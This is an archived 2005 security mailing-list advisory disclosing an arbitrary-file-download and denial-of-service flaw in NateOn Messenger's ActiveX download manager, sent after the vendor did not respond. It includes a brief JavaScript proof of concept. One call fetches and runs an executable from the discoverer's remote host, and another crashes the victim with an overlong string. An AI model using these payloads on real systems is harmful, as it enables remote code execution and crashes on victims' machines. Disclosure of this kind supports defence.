[VulnWatch] [NRVA05-08] - Arbitrary file download by NateOn Messagener's ActiveX and DoS

From: saintlinu (saintlinu_at_yahoo.co.kr)
Date: 09/29/05

  • Next message: ZATAZ Audits: "[VulnWatch] apachetop insecure temporary file creation"
    To: <bugtraq@securityfocus.com>, <vulnwatch@vulnwatch.org>, <full-disclosure@lists.grok.org.uk>
    Date: Thu, 29 Sep 2005 11:36:27 +0800
    
    

    Title: Arbitrary File Download by NateOn Messagener's ActiveX
    and DoS

    Discoverer: PARK, GYU TAE (saintlinu@null2root.org)

    Advisory No.: NRVA05-08

    Critical: Moderately Critical

    Impact: Arbitrary file download by NateOn Messagener's ActiveX
    and DoS

    Where: From remote

    Operating System: Windows Only

    Solution: unpatch yet

    Workaround: N / A

     

    Notice: 09. 17. 2005 Initiate notified

                       09. 23. 2005 2nd notified

                       09. 27. 2005 3rd notified

                       09. 29. 2005 Vendor didn't response. Disclosure
    vulnerability

     

    Description:

    The NateOn Messenger(See a NRVA05-02) is Internet Instance Messenger such
    as MSN, YAHOO and so on

     

    If installed NateOn Messenger then can exploit by
    'NateonDownloadManager.ocx' ActiveX

     

    and there is another vulnerability like Buffer Overflow

     

    See following detail describe:

     

    NOT INCLUDED HERE BUT A PIECE OF CODE

     

    <--snip-->

     

                 i = GotNate.IsNateonInstall();

                 

                 if( i == 1 ) {

                               alert('NateOn Messenger already installed. Do
    Attack ...');

                               // if you want to second order attack then try

                               i =
    GotNate.Excute("1",'http://saintlinu.null2root.org/gotit.exe','c:\\windows\\
    system32\\cmd.exe');

                               

                               // if you want to crash to victim system the try

                               i =
    GotNate.Excute("1",'http://saintlinu.null2root.org/gotit.exe','very_long_str
    ings_in_here');

                 } else {

                               alert('NateOn Messenger NOT Installed');

                 }

     

    </--snip-->

            

            
                    
    ________________________________________________________
    무료 1GB용량!, 더 이상 용량 고민없는 - 야후! 메일 (http://mail.yahoo.co.kr)
    최신 휴대폰 정보, 벨소리, 캐릭터, 문자메세지 - 야후! 모바일 (http://kr.mobile.yahoo.com)
    대한민국 블로그가 모인 곳! - 야후! 피플링(http://kr.ring.yahoo.com)


  • Next message: ZATAZ Audits: "[VulnWatch] apachetop insecure temporary file creation"

    Relevant Pages

    • [Full-disclosure] [NRVA05-08] - Arbitrary file download by NateOn Messageners ActiveX and DoS
      ... and DoS ... The NateOn Messengeris Internet Instance Messenger such ... and there is another vulnerability like Buffer Overflow ...
      (Full-Disclosure)
    • [NT] Activity Monitor Remote Denial of Service (TCP 15163)
      ... housewarming rates on automated network vulnerability ... * Activity Monitor 2002 version 2.6 ... write(sd, dos, sizeof(dos)); ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [EXPL] Buffer Overflow in MyWebServer (Exploit, GET)
      ... in MyWebServer, a vulnerability in MyWebServer allows remote attackers to ... #-r - DoS and running shellcode ...
      (Securiteam)
    • Re: Re[2]: DoS vulnerabilities in Firefox, Internet Explorer, Chrome, Opera and other browsers
      ... The issue noted there is a simple DoS attack which every programming language and platform is vulnerable too. ... It is not a 'security vulnerability' by itself and is completely agnostic of the uri handler. ... Here's the simplified JS version of it (lets call it the Universal DoS -- yes, it'd work for every browser on the planet that can execute JS) - ... Maybe allow the user to terminate the script at every iteration? ...
      (Bugtraq)
    • Re: Re[4]: DoS vulnerabilities in Firefox, Internet Explorer, Chrome, Opera and other browsers
      ... I was carried away because the author used scripts in the PoC of the issue in question which made unconditional recursion possible. ... Hence it doesn't affect or DoS the latest browsers. ... I more than agree that an issue to be classified as a security vulnerability if a combination of tags/properties/scripts causes or is capable of causing malice in any form while conforming to the standards. ... If the issue noted in this context DoS by a form of unconditional recursion to create 'out of memory' or stack overflow sortof situation but requires a task kill operation on the script engine's host (the browser in this context). ...
      (Bugtraq)